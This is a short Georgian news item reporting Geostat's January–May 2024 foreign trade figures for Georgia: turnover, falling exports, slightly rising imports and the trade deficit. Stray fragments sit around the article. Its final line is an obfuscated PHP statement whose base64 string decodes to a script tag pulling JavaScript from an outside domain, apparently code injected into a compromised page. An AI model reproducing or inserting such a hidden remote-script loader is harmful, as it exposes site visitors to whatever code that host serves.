celsiusi
ავერსი შნაიდერი

2024 წლის იანვარ-მაისში საქართველოში საქონლით საგარეო სავაჭრო ბრუნვამ (არადეკლარირებული ვაჭრობის გარეშე) 8 მილიარდ 419 მილიონი დოლარი შეადგინა, რაც წინა წლის შესაბამის მაჩვენებელზე 2.3%-ით ნაკლებია.

საქსტატის მიერ დღეს გამოქვეყნებული საგარეო ვაჭრობის ექსპრეს მონაცემების მიხედვით, პირველ ხუთ თვეში ექსპორტი 9.2%-ით 2 მილიარდ 274 მილიონ დოლარამდე შემცირდა, ხოლო იმპორტი მცირედ - 0.5%-ით 6 მილიარდ 146 მილიონ დოლარამდე გაიზარდა.

ამ პერიოდის განმავლობაში, წლიურად შემცირდა სავაჭრო სალდოც, რაც იმას ნიშნავს რომ მთლიან სავაჭრო ბრუნვაში იმპორტის მაჩვენებელი ექსპორტს აღემატება. უარყოფითმა სავაჭრო ბალანსმა 2024 წლის იანვარ-მაისში 3 მილიარდ 872 მილიონი დოლარი შეადგინა, რაც საგარეო სავაჭრო ბრუნვის 46%-ია.

152
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");